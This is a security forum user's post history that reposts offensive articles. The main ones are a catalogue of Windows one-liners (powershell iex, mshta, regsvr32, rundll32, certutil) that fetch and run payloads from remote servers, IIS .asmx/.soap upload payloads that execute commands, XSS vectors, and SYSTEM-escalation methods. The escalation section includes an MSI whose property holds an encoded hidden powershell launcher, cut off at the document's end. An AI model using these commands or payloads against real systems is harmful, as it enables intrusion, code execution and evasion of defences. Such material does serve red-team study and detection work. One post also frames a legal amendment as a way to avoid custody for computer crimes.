Everything posted by Nytro

-

Stack Based Buffer Overflows on x86 (Windows) – Part I

I wrote this article in Romanian in 2014, and I decided to translate it because it is a very detailed introduction to exploiting a “Stack Based Buffer Overflow” on x86 (32-bit) Windows.

Introduction

This tutorial is for beginners, but it requires at least some basic knowledge of C/C++ programming in order to understand the concepts. The system on which we will exploit the vulnerability is Windows XP (32-bit, x86), chosen for simplicity: it has no DEP or ASLR, protections that will be detailed later. I would like to start with a short introduction to assembly (ASM) language. It will not be very detailed, but I will briefly describe the concepts required to understand what a “buffer overflow” vulnerability looks like and how it can be exploited. There are multiple types of buffer overflows; here we will discuss only the one that is easiest to understand, the stack based buffer overflow.

Source: https://nytrosecurity.com/2017/12/09/stack-based-buffer-overflows-on-x86-windows-part-i/

-



Hi,

Today I was looking through the changes made by our "friends" from PSD-ALDE and I noticed something interesting. It concerns "Art. 223 Conditions and cases for applying the measure of pre-trial arrest", paragraph 2.

Original text: "The measure of pre-trial arrest of the defendant may also be taken if the evidence gives rise to a reasonable suspicion that the defendant committed an intentional offence against life, an offence that caused bodily harm or the death of a person, an offence against national security provided for by the Criminal Code and other special laws, a drug trafficking offence, an offence of carrying out illegal operations with precursors or other products likely to have psychoactive effects, an offence concerning non-compliance with the regime of weapons, ammunition, nuclear materials and explosive materials, trafficking and exploitation of vulnerable persons, acts of terrorism, money laundering, counterfeiting of currency, stamps or other valuables, blackmail, rape, unlawful deprivation of liberty, tax evasion, outrage (assault on a public official), judicial outrage, a corruption offence, an offence committed through computer systems or electronic means of communication, or another offence for which the law provides a prison sentence of 5 years or more and, based on an assessment of the seriousness of the act, the manner and circumstances in which it was committed, the entourage and environment the defendant comes from, the defendant's criminal record and other circumstances concerning the defendant, it is found that deprivation of liberty is necessary to remove a state of danger to public order."

Amended text: "The measure of pre-trial arrest of the defendant may also be taken if the evidence gives rise to a reasonable suspicion that the defendant committed an intentional offence against life, an offence that caused bodily harm or the death of a person, an offence against national security provided for by the Criminal Code and other special laws, an offence of narcotics trafficking, arms trafficking, human trafficking, terrorism and offences concerning acts of terrorism, counterfeiting of currency or other valuables, blackmail, rape, deprivation of liberty, outrage (assault on a public official), judicial outrage, or another offence committed with violence and, cumulatively, based on an assessment of the seriousness of the act, the manner and circumstances in which it was committed, the entourage and environment the defendant comes from, the defendant's criminal record and other circumstances concerning the defendant, it is found that deprivation of liberty is absolutely necessary to remove a state of concrete danger to public order."

Here is a DIFF:

As I expected, you can see that the following are missing:
- money laundering
- tax evasion
- corruption offences

But also "an offence committed through computer systems or electronic means of communication".

In other words, in my opinion as someone with no expertise in the legal field, pre-trial arrest will no longer apply to those offences. I posted this so that, if you are ever accused of "offences committed through computer systems", you keep in mind that (if the law passes, and it probably will) you cannot be held in custody.

You can find a collection of PSD-brand amendments here: http://media.hotnews.ro/media_server1/document-2017-12-14-22176865-0-transpunere-directiva-nevinovatie-13-dec.pdf

-

I'm more worried about them: https://www.seagate.com/de/de/enterprise-storage/nytro-drives/

-

I've had the username "Nytro" since around 2007-2008. I need to check when they chose the company's name so I know who has priority. Yes, what you say is true, I'll think of something else too, thanks!

-

I've started a blog too. I won't write very often, just every now and then... https://nytrosecurity.com/

-

A guy named Slick made that program (Conquistador killer), and he was an admin here on the forum. The same kind of program can be made for other games of that type. If you had bought it, you could also have cracked it and not cared about its license anymore, right?

-

Invest in eggs. Thank me later.

-

$48 a year? For that money I can get Yahoo! Premium/Pro, it costs the same. </joke>

-

eMAG has some discounts with the voucher "eMAG16ani". The discounts (on many products) are small, but genuine. Any product gets 5% off. I had been looking at the Huawei Mate 10 Pro, and the discount is a real 170 RON. Some categories have discounts of 10%-20%-30%. Maybe it helps.

-

No idea. They could give a sign if they are still around.

-

Why <blank> Gets You Root https://objective-see.com/blog/blog_0x24.html

-

Do you have some 0day you don't want to tell us about? Batman can write kernel exploits too if he wants...

-

Change the root password

1. Choose Apple menu > System Preferences, then click Users & Groups (or Accounts).
2. Click the lock icon, then enter an administrator name and password.
3. Click Login Options.
4. Click Join (or Edit).
5. Click Open Directory Utility.
6. Click the lock icon in the Directory Utility window, then enter an administrator name and password.
7. From the menu bar in Directory Utility, choose Edit > Change Root Password…
8. Enter a root password when prompted.

Via: https://support.apple.com/en-us/HT204012

-

Another crappy one, after the one that showed the password in place of the hint. Do they no longer have the budget for good developers?

-

Syscall Monitor

Introduction

This is a process monitoring tool (like Sysinternals' Process Monitor) implemented with Intel VT-x/EPT for Windows 7+.

Development Environment

- Visual Studio 2015 update 3
- Windows SDK 10
- Windows Driver Kit 10
- QT5.7 for MSVC

Deployment

- QT GUI project: SyscallMonQT/SyscallMonQT.pro
- Windows kernel driver project: ddimon/DdiMon/DdiMon.vcxproj
- Remember to change the shadow build path to /build32 or /build64 when configuring the QT project
- Remember to change the windeploy.exe path in deploy32/deploy64.bat, then run deploy32/64.bat to deploy the x86/x64 binary files to bin32/bin64
- Remember to sign the x64 kernel driver file

Platform

- x86 and x64 Windows 7, 8.1 and 10
- CPU with Intel VT-x and EPT technology support

Reference & Thanks

- BOOST http://www.boost.org/
- QT https://www.qt.io/
- HyperPlatform https://github.com/tandasat/HyperPlatform
- Capstone http://www.capstone-engine.org/

TODO

1. Optimize the memory usage.

Source: https://github.com/hzqst/Syscall-Monitor

-

Windows oneliners to download remote payload and execute arbitrary code

20 November 2017, arno0x0x

In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself: "what are the coolest command lines an attacker could use besides the famous powershell oneliner?"

These command lines need to fulfill the following prerequisites:

- allow for execution of arbitrary code, because spawning calc.exe is cool, but has its limits, huh?
- allow for downloading its payload from a remote server, because your super malware/RAT/agent will probably not fit into a single command line, will it?
- be proxy aware, because which company doesn’t use a web proxy for outgoing traffic nowadays?
- make use of Microsoft binaries that are as standard and widely deployed as possible, because you want this command line to execute on as many systems as possible
- be EDR friendly: oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet?
- work in memory only, because your final payload might get caught by AV when written to disk

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries.

Let’s be clear that not all command lines will fulfill all of the above points. Especially the "do not write the payload on disk" one, because most of the time the downloaded file will end up in a local cache.
When it comes to downloading a payload from a remote server, it basically boils down to 3 options:

- either the command itself accepts an HTTP URL as one of its arguments
- the command accepts a UNC path (pointing to a WebDAV server)
- the command can execute a small inline script with a download cradle

Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one of the following locations:

- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>

On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:

- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it’s not started, in order to start it even from a low privileged user, simply prepend your command line with "pushd \\webdavserver & popd".

In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk.

Powershell

Ok, this is by far the most famous one, but also probably the most monitored one, if not blocked. A well known proxy friendly command line is the following:

    powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO (at least nowhere I could find using procmon!)

Of course you could also use its encoded counterpart.
But you can also call the payload directly from a WebDAV server:

    powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cmd

Why make things complicated when you can have cmd.exe executing a batch file? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of!). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior’s work), and see that you can easily drop any binary, dll, script: https://github.com/Arno0x/PowerShellScripts

So once you’ve been creative with your payload as a batch file, go for it:

    cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript

Also very common, but the idea here is to download the payload from a remote server in one command line:

    cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta

Mshta really is in the same family as cscript/wscript, but with the added capability of executing an inline script which will download and execute a scriptlet as a payload:

    mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

You could also do a much simpler trick, since mshta accepts a URL as an argument to execute an HTA file:

    mshta http://webserver/payload.hta

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Finally, the following also works, with the advantage of hiding mshta.exe downloading stuff:

    mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32

A well known one as well, which can be used in different ways. The first one is referring to a standard DLL using a UNC path:

    rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32 can also be used to call some inline jscript:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Process performing network call: rundll32.exe
Payload written on disk: IE local cache

Regasm/Regsvc

Regasm and Regsvc are among those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (it can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32

Another one from @subTee. This one requires a slightly different scriptlet from the mshta one above. First option:

    regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Second option using UNC/WebDAV:

    regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Odbcconf

This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. Note that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

    odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Msbuild

Let’s keep going with all these .Net framework utilities discovered by @subTee.
You can NOT use msbuild.exe with an inline task straight from a UNC path (actually, you can, but it gets really messy), so I ended up with the following trick, using msbuild.exe only. Note that it needs to be called within a shell with ENABLEDELAYEDEXPANSION (/V option):

    cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

Combining some commands

After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective.

For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:

    certutil -urlcache -split -f http://webserver/payload payload

Now combining some commands in one line, with InstallUtil.exe executing a specific DLL as a payload:

    certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

You could simply deliver an executable:

    certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

There are probably many other ways of achieving the same result, but these command lines do the job while fulfilling most of the prerequisites we set at the beginning of this post!

One may wonder why I do not mention the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose, simply because it’s not proxy aware.
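For anyone monitoring for these command lines, the per-technique observations above (which process performs the network call, and where the payload lands on disk) can be collected into a small lookup table. The Python sketch below only restates what the article reports for each command; the `Technique` class, its field names and the `network_processes` helper are hypothetical names chosen for illustration, and the table says nothing about Windows versions or configurations the article did not test.

```python
from dataclasses import dataclass

IE_CACHE = "IE local cache"
WEBDAV_CACHE = "WebDAV client local cache"


@dataclass(frozen=True)
class Technique:
    """One row of the article's observations (field names are illustrative)."""
    binary: str            # Microsoft binary used on the command line
    source: str            # "http" (URL argument / inline cradle) or "webdav" (UNC path)
    network_process: str   # process reported as performing the network call
    disk_artifact: str     # where the article saw the payload written


TECHNIQUES = [
    Technique("powershell", "http", "powershell.exe", "none found with procmon"),
    Technique("powershell", "webdav", "svchost.exe", WEBDAV_CACHE),
    Technique("cmd", "webdav", "svchost.exe", WEBDAV_CACHE),
    Technique("cscript/wscript", "webdav", "svchost.exe", WEBDAV_CACHE),
    Technique("mshta", "http", "mshta.exe", IE_CACHE),
    Technique("mshta", "webdav", "svchost.exe", WEBDAV_CACHE),
    Technique("rundll32", "webdav", "svchost.exe", WEBDAV_CACHE),
    Technique("rundll32", "http", "rundll32.exe", IE_CACHE),
    Technique("regasm/regsvc", "webdav", "svchost.exe", WEBDAV_CACHE),
    Technique("regsvr32", "http", "regsvr32.exe", IE_CACHE),
    Technique("regsvr32", "webdav", "svchost.exe", WEBDAV_CACHE),
    Technique("odbcconf", "webdav", "svchost.exe", WEBDAV_CACHE),
    Technique("msbuild", "webdav", "svchost.exe", WEBDAV_CACHE),
]


def network_processes(source: str) -> list[str]:
    """Return the sorted set of processes seen on the network for a given source type."""
    return sorted({t.network_process for t in TECHNIQUES if t.source == source})


if __name__ == "__main__":
    for src in ("http", "webdav"):
        print(src, "->", ", ".join(network_processes(src)))
```

The pattern that falls out of the table is the one the article keeps pointing at: every UNC/WebDAV variant shows svchost.exe on the network, while the HTTP variants expose the calling binary itself.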
Payloads source examples

All the command lines previously cited make use of specific payloads:

- Various scriptlets (.sct), for mshta, rundll32 or regsvr32
- HTML Application (.hta)
- MSBuild inline tasks (.xml or .csproj)
- DLL for InstallUtil or Regasm/Regsvc

You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco.

You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT

You can also find some other examples on my gist: https://gist.github.com/Arno0x

Source: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/

-

SG1

BECAUSE REASONS

SG1 is a wanna be swiss army knife for data encryption, exfiltration and covert communication. At its core, sg1 aims to be as simple to use as nc while maintaining high modularity internally, being a framework for bizarre exfiltration, data manipulation and transfer methods.

Have you ever thought of having your chats or data transfers tunneled through encrypted, private and self deleting pastebins? What about sending that stuff to some dns client -> dns server bridge? Then TLS maybe?
WORK IN PROGRESS, DON'T JUDGE

Installation

Make sure you have at least go 1.8 in order to build sg1, then:

    go get github.com/miekg/dns
    go get github.com/evilsocket/sg1
    cd $GOPATH/src/github.com/evilsocket/sg1/
    make

If you want to build for a different OS and / or architecture, you can instead do:

    GOOS=windows GOARCH=386 make

After compilation, you will find the sg1 binary inside the build folder. You can start by taking a look at the help menu:

    ./build/sg1 -h

Source: https://github.com/evilsocket/sg1

-

Why BlackList < WhiteList

22 Nov 2017

Often, when you write code that handles file uploads, you check the extension of the uploaded file using either a “whitelist” (only files with certain extensions can be uploaded) or a “blacklist” (any file can be uploaded unless its extension is on the list). After @ldionmarcil’s post, I decided to find out how popular web servers handle various extensions. First, I was interested in which content-type the web server returns for different file types.

Developers usually include only well-known and obvious extensions in the blacklist. In this article, I want to look at the less common file types.

For the demonstration PoC, I used the following payloads:

- Basic XSS payload: <script>alert(1337)</script>
- XML-based XSS payload: <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>

Below I’ll show the results of this little research.

IIS web server

By default, IIS responds with the text/html content-type for the file types listed below.

Extensions with basic vector: .cer .hxt .htm

Therefore, it is possible to place the basic XSS vector in the uploaded file, and we will get an alert box in the browser after opening the document.

The list below includes the extensions for which IIS responds with a content-type that allows XSS to be executed via the XML-based vector.

Extensions with XML-based vector: .dtd .mno .vml .xsl .xht .svg .xml .xsd .xsf .svgz .xslt .wsdl .xhtml

By default, IIS also supports SSI; however, the exec section is prohibited for security reasons.

Extensions for SSI: .stm .shtm .shtml

More detailed information about SSI is given in the post by @ldionmarcil.

In addition: there are also two other interesting extensions (.asmx and .soap) that could lead to arbitrary code execution. This was discovered in collaboration with Yury Aleinov (@YuryAleinov).

Asmx extension

If you can upload a file with the .asmx extension, it can lead to arbitrary code execution.
For example, we took a file with the following content:

    <%@ WebService Language="C#" Class="MyClass" %>
    using System.Web.Services;
    using System;
    using System.Diagnostics;

    [WebService(Namespace="")]
    public class MyClass : WebService
    {
        [WebMethod]
        public string Pwn_Function()
        {
            Process.Start("calc.exe");
            return "PWNED";
        }
    }

Then we sent a POST request to the uploaded document:

    POST /1.asmx HTTP/1.1
    Host: localhost
    Content-Type: application/soap+xml; charset=utf-8
    Content-Length: 287

    <?xml version="1.0" encoding="utf-8"?>
    <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
      <soap12:Body>
        <Pwn_Function/>
      </soap12:Body>
    </soap12:Envelope>

As a result, IIS executed “calc.exe”.

Soap extension

Contents of the uploaded file with the .soap extension:

    <%@ WebService Language="C#" Class="MyClass" %>
    using System.Web.Services;
    using System;

    public class MyClass : MarshalByRefObject
    {
        public MyClass()
        {
            System.Diagnostics.Process.Start("calc.exe");
        }
    }

SOAP request:

    POST /1.soap HTTP/1.1
    Host: localhost
    Content-Length: 283
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "/"

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
        <MyFunction />
      </soap:Body>
    </soap:Envelope>

Apache (httpd or Tomcat)

Extensions with basic vector: .shtml .html.de or .html.xxx (xxx – any characters)*

Extensions with XML-based vector: .rdf .xht .xml .xsl .svg .xhtml .svgz

* if there are any characters after “.html.” in the extension, Apache will respond with the text/html content-type.

In addition: Apache returns a response without a Content-Type header for a large number of files with different extensions, which allows an XSS attack, because the browser often decides by itself how to handle such a page.
This article includes detailed information about this question. For example, files with the .xbl and .xml extensions are processed similarly in Firefox (if there is no Content-Type header in the response), so it is possible to exploit XSS using the XML-based vector in this browser.

Nginx

Extensions with basic vector: .htm

Extensions with XML-based vector: .svg .xml .svgz

Source: https://mike-n1.github.io/ExtensionsOverview
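To make the article's argument concrete, here is a minimal sketch of a whitelist check for uploaded file names, in Python. The allowed set, the function name `is_allowed_upload` and the rule of accepting exactly one extension are assumptions made for illustration, not something the article prescribes; the single-extension rule is there because of the “.html.xxx” behaviour described for Apache above. It validates the name only and does not inspect the file content.

```python
import os

# Hypothetical whitelist for an image-upload feature; adjust to the application.
# .svg is deliberately absent: the article lists it as an XML-based XSS vector.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}


def is_allowed_upload(filename: str) -> bool:
    """Accept a file name only if it has exactly one, whitelisted extension."""
    # Drop any directory part, whichever path separator the client used.
    name = os.path.basename(filename.replace("\\", "/")).lower()

    # Reject empty names, dot-files, and names with trailing dots or spaces.
    if not name or name.startswith(".") or name != name.strip(" ."):
        return False

    # Exactly one dot: "page.html.de" and "shell.asmx.png" are both refused.
    parts = name.split(".")
    if len(parts) != 2:
        return False

    return "." + parts[1] in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for candidate in ("photo.png", "1.asmx", "page.html.de", "logo.svg"):
        print(candidate, is_allowed_upload(candidate))
```

With a blacklist, every extension in the lists above (.cer, .hxt, .asmx, .soap, .xht and so on) would have to be known in advance; with the whitelist they are refused simply because they were never allowed.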

-

VEHICLE

Viewstate Hidden Event Enumerator! An advanced toolset for testing modern web application frameworks and rich internet applications.

VEHICLE (formerly known as ria-scip) is a pentest platform with advanced testing features for modern web application frameworks (MWAF) and rich internet applications (RIA). It enables testers to affect various server control properties and to enumerate and execute dormant events of invisible, visible, disabled and commented server web controls (currently supported for ASP.net and Mono). These features are implemented by abusing application misconfigurations and framework-specific programming flaws, and by manipulating proprietary input formats. The project is implemented as an extension to the OWASP Zed Attack Proxy (ZAP) project.

Developed by Hacktics ASC

Link: https://github.com/hacktics/vehicle

-

Monitor activity of any driver Link: https://github.com/zodiacon/DriverMon

-

Alternative methods of becoming SYSTEM

Posted on 20th November 2017
Tagged in redteam, windows, meterpreter

For many pentesters, Meterpreter's getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever wondered just how this works behind the scenes? In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky redteam engagements.

Meterpreter's "getsystem"

Most of you will have used the getsystem module in Meterpreter before. For those that haven't, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing we first need to understand a little about how a process can impersonate another user. Impersonation is a useful method provided by Windows in which a process can impersonate another user's security context. For example, if a process acting as an FTP server allows a user to authenticate and only wants to allow access to files owned by a particular user, the process can impersonate that user account and allow Windows to enforce security.

To facilitate impersonation, Windows exposes numerous native APIs to developers, for example:

- ImpersonateNamedPipeClient
- ImpersonateLoggedOnUser
- ReturnToSelf
- LogonUser
- OpenProcessToken

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module's functionality, and takes credit for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;).
For example, if a process belonging to "victim" connects and writes to a named pipe belonging to "attacker", the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to "victim", and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege. This privilege is by default only available to a number of highly privileged users.

This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
3. The Windows service is started, causing a connection to be made to the named pipe.
4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.

To show how this can be achieved outside of the Meterpreter-Framework, I've previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.

To see how this works when executed, a demo can be found below:

Now that we have an idea of just how getsystem works, let's look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process.

This came about after a bit of research I was doing into the Duqu 2.0 malware, in which this APT actor was delivering malware packaged within an MSI file.
It turns out that a benefit of launching your code via an MSI is the SYSTEM privileges that you gain during the install process. To understand how this works, we need to look at WIX Toolset, which is an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

- candle.exe - Takes a .WIX XML file and outputs a .WIXOBJ
- light.exe - Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting: it documents a simple way in which an MSI can be used to launch processes as SYSTEM, by providing a custom action with an Impersonate attribute set to false.

When crafted, our WIX file will look like this:

    <?xml version="1.0"?>
    <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
      <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
        <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
        <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
        <Directory Id="TARGETDIR" Name="SourceDir">
          <Directory Id="ProgramFilesFolder">
            <Directory Id="INSTALLLOCATION" Name="Example">
              <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
                <File Id="ApplicationFile1" Source="example.exe"/>
              </Component>
            </Directory>
          </Directory>
        </Directory>
        <Feature Id="DefaultFeature" Level="1">
          <ComponentRef Id="ApplicationFiles"/>
        </Feature>
        <Property Id="cmdline">powershell.exe -nop -w hidden -e 
aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABlAGgAQQBGAG8AQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBEAEkAUwBVAEoAbABLAGwAVwAvAE8AZQBBAEkARQA0AEcAQQBoAEYAcAA0ADIAOQBOAGcAdQBMADEAMQAyAHYAZQBlAHYAMQB2ADkAOABZADcASgBTAHEAeQBWADIAdgAwAGwAbQBKADIAUABYAE8ANwBEADcAegB6AEQATQA3AGQAaQBQAGYAbABwAFQANwBTAHIAZwBZADMAVwArAFgAZQBLADEAOABmAGYAdgBtAHIASQA4AEYAWABpAGwAcQBaAHQAMABjAFAAeABRAHIAKwA0AEQAdwBmAGsANwBKAGkASABFAHoATQBNAGoAVgBwAGQAWABUAHoAcwA3AEEASwBpAE8AVwBmADcAYgB0AFYAYQBHAHMAZgBGAEwAVQBLAFEAcQBDAEcAbAA5AGgANgBzACsAdQByADYAdQBSAEUATQBTAFgAeAAzAG0AKwBTAFMAUQBLAFEANwBKADYAWQBwAFMARQBxAHEAYgA4AHAAWQB6AG0AUgBKAEQAegB1ADYAYwBGAHMAYQBYAHkAVgBjAG4AOABtAFcAOAB5AC8AbwBSAFoAWQByAGEAcgBZAG4AdABPAGwASABQAGsATwAvAEYAYQBoADkAcwA0AHgAcABnADMAQQAwAGEAbABtAHYAMwA4AE8AYQB0AE4AegA0AHUAegBmAFAAMQBMAGgARgBtAG8AWgBzADEAZABLAE0AawBxADcAegBDAFcAMQBaAFIAdgBXAG4AegBnAHcAeQA0AGcAYQByAFoATABiAGMARgBEADcAcwByADgAaQBQAG8AWABwAGYAegBRAEQANwBGAEwAZQByAEQAYgBtAG4AUwBKAG4ASABNAG4AegBHAG8AUQBDAGYAdwBKAEkAaQBQAGgASwA4ADgAeAB4AFoAcwBjAFQAZABRAHMARABQAHUAQwAyADgAaAB4AEIAQQBuAEIASQA5AC8AMgAxADMAeABKADEASQB3AGYATQBaAFoAVAAvAGwAQwBuAEMAWQBMADcAeQBKAGQAMABSAFcAQgBkAEUAcwBFAEQAawA0AGcAMQB0AFUAbQBZAGIAMgBIAGYAWQBlAFMAZQB1AEQATwAxAFIAegBaAHAANABMAC8AcQBwAEoANAA2AGcAVgBWAGYAQwBpADAASAAyAFgAawBGAGEAcABjADcA
